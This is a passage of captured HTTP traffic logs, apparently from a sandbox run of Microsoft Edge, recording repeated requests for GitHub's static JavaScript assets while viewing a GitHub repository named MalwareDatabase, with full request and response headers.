accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 21 Jan 2025 16:08:02 GMT
etag: "0x8DD3A35C80A2242"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 203810
x-served-by: cache-iad-kiad7000137-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 3, 763
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 57b251a9a7103e5a7989044c1b82df4b9b7d00d7
content-length: 16164
-
Remote address:185.199.109.154:443RequestGET /assets/repositories-8174cf9be44d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FC02FE8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1417694
x-served-by: cache-iad-kiad7000022-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 584, 564
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7328a439f71e68bd9eba669b7843e0cccaf3b5d9
content-length: 3500
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD1544602C817F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1415678
x-served-by: cache-iad-kjyo7100132-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 55, 1138
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bb0b363cf8ce9b3e8e9748e3121615273912687d
content-length: 5120
-
Remote address:185.199.109.154:443RequestGET /assets/code-menu-534f8f82fbb7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 15:23:02 GMT
etag: "0x8DD4078D280349B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 105909
x-served-by: cache-iad-kjyo7100153-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 12, 1248
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bcd99f2ca688004d169207c90f9b4347733cbd7a
content-length: 5374
-
Remote address:185.199.109.154:443RequestGET /assets/primer-react-6bae0b4b7a9d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 27 Jan 2025 19:54:43 GMT
etag: "0x8DD3F0C71EC3977"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 199798
x-served-by: cache-iad-kiad7000077-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 1411
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1b76fd86aa9c4fa28a60e1f7414233e98a7e2d7f
content-length: 6387
-
Remote address:185.199.109.154:443RequestGET /assets/react-core-f38f343438ca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 15:23:00 GMT
etag: "0x8DD4078D1493910"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 105906
x-served-by: cache-iad-kjyo7100173-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 14, 1776
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4849eabe98ddf792eb2e465219375724c7eff8ad
content-length: 6176
-
Remote address:185.199.109.154:443RequestGET /assets/react-lib-2131e17288a8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD1544602C33B7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443368
x-served-by: cache-iad-kjyo7100030-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 71, 967
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3155c62beafb7c66d59d09348a410268a28003ed
content-length: 5246
-
Remote address:185.199.109.154:443RequestGET /assets/octicons-react-611691cca2f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:23 GMT
etag: "0x8DD34DA697193FB"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207967
x-served-by: cache-iad-kcgs7200044-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 14, 1006
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1494e1f1d6ee49b7cad856d76fb584a42dfb0591
content-length: 4150
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:52 GMT
etag: "0x8DD0327DE7A8BE3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1874005
x-served-by: cache-iad-kiad7000107-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 49, 751
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1a6258ddd2ad425d2d9ea5e9adaa9378d75a2826
content-length: 8037
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E029647C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 895172
x-served-by: cache-iad-kcgs7200065-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 33, 549
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 939baf61c23db2cf35030620580edf637247b127
content-length: 3412
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 15:32:27 GMT
etag: "0x8DD0D665E7C17D4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 2648415
x-served-by: cache-iad-kcgs7200094-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 631
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9143c815abf5c07a73c1a52947e68621191e6c29
content-length: 2646
-
GEThttps://github.githubassets.com/assets/notifications-subscriptions-menu-a1b6f52b86ff.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/notifications-subscriptions-menu-a1b6f52b86ff.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:02 GMT
etag: "0x8DD34DA5CDADA7D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207981
x-served-by: cache-iad-kiad7000118-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4856, 672
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dd00d84d1df38ac7a9760680cad80391fd115531
content-length: 3477
-
GEThttps://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-006e4d0cf710.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_ui-commands_ui-commands_ts-006e4d0cf710.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 15:23:04 GMT
etag: "0x8DD4078D359C1A9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 105900
x-served-by: cache-iad-kiad7000114-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 11, 912
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 23700e4e0ae7a851dc5d01d1dd9d0726938df636
content-length: 22528
-
Remote address:185.199.109.154:443RequestGET /assets/keyboard-shortcuts-dialog-3d37f1665ad7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 13 Jan 2025 20:20:11 GMT
etag: "0x8DD340FAEACEFE9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 718251
x-served-by: cache-iad-kjyo7100130-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 13, 1275
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 070d042757ae814566004498c802d460e6505781
content-length: 109958
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 21:04:21 GMT
etag: "0x8DD40A880853D08"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 22436
x-served-by: cache-iad-kjyo7100128-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 31, 769
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 875d9e5e97b48c7c1c341981a03c3484e3ce6ca2
content-length: 41985
-
Remote address:185.199.109.154:443RequestGET /assets/sessions-4f48836d3e05.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:38 GMT
etag: "0x8DD02B44DEAF90D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443368
x-served-by: cache-iad-kjyo7100051-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 12446, 1189
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cdff9b8ed7e3b9b753502c162187eaa9d4ed8773
content-length: 54804
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 07 Jan 2025 20:44:44 GMT
etag: "0x8DD2F5C1DF89D77"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kiad7000074-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 62, 1223
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 96f601be5708df8ef043b06a5d9caf243c467287
content-length: 90082
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E025E5FB"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kcgs7200172-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1157
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4e40d4e1dde6b01e9ec1a471fb8e8841ec72723c
content-length: 3077
-
GEThttps://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-5fd3ba80197f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-5fd3ba80197f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 01:30:47 GMT
etag: "0x8DD3F3B64406EA2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 105908
x-served-by: cache-iad-kjyo7100087-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 15, 1789
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c1ab7da0dad9414a9c57a88e7296d44a700132e0
content-length: 16517
-
Remote address:185.199.109.154:443RequestGET /assets/ui_packages_paths_index_ts-a665ced57b80.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 18:06:37 GMT
etag: "0x8DD3FC6820DCCF9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 114003
x-served-by: cache-iad-kcgs7200044-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 10, 1245
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b2c64352bac86d681bab7069cd00894db1d51941
content-length: 3123
-
GEThttps://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 22:39:35 GMT
etag: "0x8DD40B5CE53B50D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
